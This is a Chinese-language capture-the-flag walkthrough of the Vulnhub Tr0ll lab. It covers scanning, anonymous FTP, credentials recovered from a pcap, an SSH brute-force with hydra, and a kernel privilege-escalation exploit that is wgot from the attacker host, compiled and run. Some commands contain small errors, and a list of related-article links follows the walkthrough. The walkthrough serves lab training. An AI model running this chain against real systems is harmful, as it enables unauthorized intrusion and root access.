攻击机:172.20.10.3

一、靶机IP扫描

arp-scan -l

确定靶机IP为172.20.10.2。

二、端口扫描

nmap -T4 -sV -p- -A 172.20.10.2

得到 21、22、80三个端口,21是ftp端口,22是ssh端口,80是web服务端口。

访问80端口

一张图片,没什么。

dirb扫一下后台

dirb http:172.20.10.2

发现了robots协议和一个secret的文件夹。server-status是403.

robots.txt提示的也是/secret这个路径。

还是这个图

访问21端口

因为是ftp服务,所以要通过ftp协议访问而不是http。

ftp://172.20.10.2:21

发现一个流量包,下载下来,用wireshark打开。

首先发现了两个FTP包,得到了FTP服务的用户名密码。

anonymous/password

挨个往下翻着看,可以看到SYST命令和LIST命令。

再往下看到了一个文件访问的流量包

一个叫secret_stuff.txt的文件,应该是提示。

直接在过滤器里面搜FTP-DATA的流量包

在一个里面看到了sup3rs3cr3tdirlol这个文件,不知道是21端口还是80端口,都试一下,发现在80端口下。

下载下来。

三、文件分析

file roflmao

查看文件类型

是可执行文件,给文件赋权执行。

chmod +x roflmao
 ./roflmao

得到了一个0x0856BF,看起来很像进程地址,但是我们还没有getshell,所以应该不是。可能依然是一个文件夹,80端口再试一下。

发现两个文件夹。

good_luck里面有一个文件:which_one_lol.txt,内容如下。

this_folder_contains_the_password有一个Pass.txt文件。

这两个文件应该就是账号密码了,文件名已经有很明显的提示了,good luck就是让你猜的,第二个也是说包含了密码。

四、端口爆破

现在21端口和80端口都利用过了,只有21端口的ssh没有用过,所以应该是爆破ssh的。通过hydra爆破ssh端口

hydra -L which_one_lol.txt -p Pass.txt 172.20.10.2 ssh

得到用户名/密码为:overflow/Pass.txt

五、提权

通过ssh连接

ssh overflow@172.20.10.2

然后输入密码。

连接成功后查看内核版本。

uname -a

版本是Linux 3.13.0

去payload库查找对应版本的提权payload

cd /usr/…/exploitdb/exploits/linux/local
 searchsploit Linux 3.13.0

选择标红的这个。复制根目录。

cp /usr/share/exploitdb/exploits/linux/local/37292.c /

在根目录启动http服务

python3 -m SimpleHTTPServer 1234

靶机切换到tmp,下载对应文件

wget http://172.20.10.3:1234/37292.c

gcc编译

gcc 37292.c -o 37292

运行

提权成功

Vulnhub-Tr0ll相关推荐

  1. vulnhub Tr0ll: 2

    本文思路 nmap扫描---->dirb扫描发现robots---->dirb配合找到的字典爆破目录---->访问目录下载图片---->strings考察图片,发现新目录y0u ...

  2. 挑战全网最详细靶机教程——vulnhub靶机实战vulnhub Tr0ll: 1【适合刚接触的新人学习】

    靶机地址:https://www.vulnhub.com/entry/tr0ll-1,100/ 靶机难度:简单 靶机发布日期:2014年8月14日 靶机描述:Tr0ll的灵感来自OSCP实验室中不断摇 ...

  3. vulnhub Tr0ll: 1

    本文思路 nmap扫描开放端口---->匿名登录ftp,下载lol.pcap---->wireshark打开并分析lol.pcap,找到sup3rs3cr3tdirlol目录----> ...

  4. 【VUlnhub】Tr0ll+Dr4g0n b4ll

    Tr0ll 开了三个端口21,22,80 先访问网站 没啥,扫一下目录 试试ftp的匿名登录 用户名anonymous 无密码 匿名文件传输能够使用户与远程主机建立连接并以匿名的身份从远程主机上拷贝文 ...

  5. vulnhub靶机Tr0ll1渗透笔记

    Tr0ll:1渗透笔记 靶场下载地址:https://www.vulnhub.com/entry/tr0ll-1,100/ kali ip:192.168.20.128 靶机和kali位于同一网段 信 ...

  6. 渗透测试靶机搭建_对vulnhub中Android4靶机渗透测试全过程!

    Android4靶机简介 名称:Android4 操作系统:Android v4.4 标志:/data/root/(在此目录中) 等级:初学者. 下载链接:Android4:https://downl ...

  7. Vulnhub靶机渗透之 RAVEN: 1

    目录 Description 网卡信息 信息收集 主机发现 主机存活扫描 端口扫描 网站信息 网站首页 nikto 报告 service 页面 wordpress 渗透过程 SSH 爆破 Hydr 命 ...

  8. [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...

  9. 【Vulnhub靶机系列】DC2

    基本信息 Kali:192.168.61.145 DC2:192.168.61.162 实验过程 在Kali中先进行内网探活 sudo arp-scan --interface eth0 192.16 ...

  10. 【Vulnhub靶机系列】DC1

    基本信息 Kali: 192.168.56.116 DC1: 192.168.56.115 实验过程 先在Kali中使用arp-scan进行主机探活 sudo arp-scan --interface ...

最新文章

  1. python使用退格键时出现^H解决方法
  2. 轮播swiper配置选项
  3. 模态框在IE下的问题,即position:fixed在IE下不兼容的处理方式
  4. 【BZOJ4500】矩阵(差分约束)
  5. sql java blob_JAVA和SQL关于BLOB的很大的问题?……
  6. 确认订单 - 提交并且接受订单信息
  7. 不越狱换壁纸_终于来了!iOS 14.3 正式版,可自动定时换壁纸
  8. 管理角色认知-工程师到管理者角色发生了哪些变化?
  9. 0.00...1是个什么数?
  10. P3800 Power收集
  11. java父类和mysql主表关系_Java工程师考试题 | 学步园
  12. python 协程进阶
  13. 苹果手机计算机切换用户名,苹果ID如何切换账号?苹果手机切换ID登录使用教程...
  14. 坚果pro3刷miui_锤子科技坚果Pro 3(12GB/256GB/全网通)手机卡怎么办?
  15. C# 实现屏幕键盘 (ScreenKeyboard)
  16. 浏览器主页被修改的解决方案
  17. QQ空间无法点赞或者QQ空间点赞被取消
  18. 数据结构---尾部插入法
  19. cl 7ar xyz index php,GIF 文件格式分析 -- chinawrc的世界 -- [北方博客].mht
  20. 前端框架 ng 环境配置

热门文章

  1. 4周年——学而不思则罔,思而不学则殆
  2. 抓包工具以及如何看抓包信息
  3. android 6.0 logcat机制(一)java层写log,logd接受log
  4. mysql 执行顺序 SQL语句执行顺序分析
  5. 数字信号处理 --- 用离散傅里叶变换(循环卷积)实现线性卷积(个人学习笔记)
  6. 《我的菜谱》-西红柿炒鸡蛋
  7. 计算机组成原理实验一:运算器组成的实验
  8. 计算机核心期刊的终审环节,核心期刊终审状态要多久
  9. java人工智能之神经网络中的层数怎么确定
  10. maven仓库中查找依赖的步骤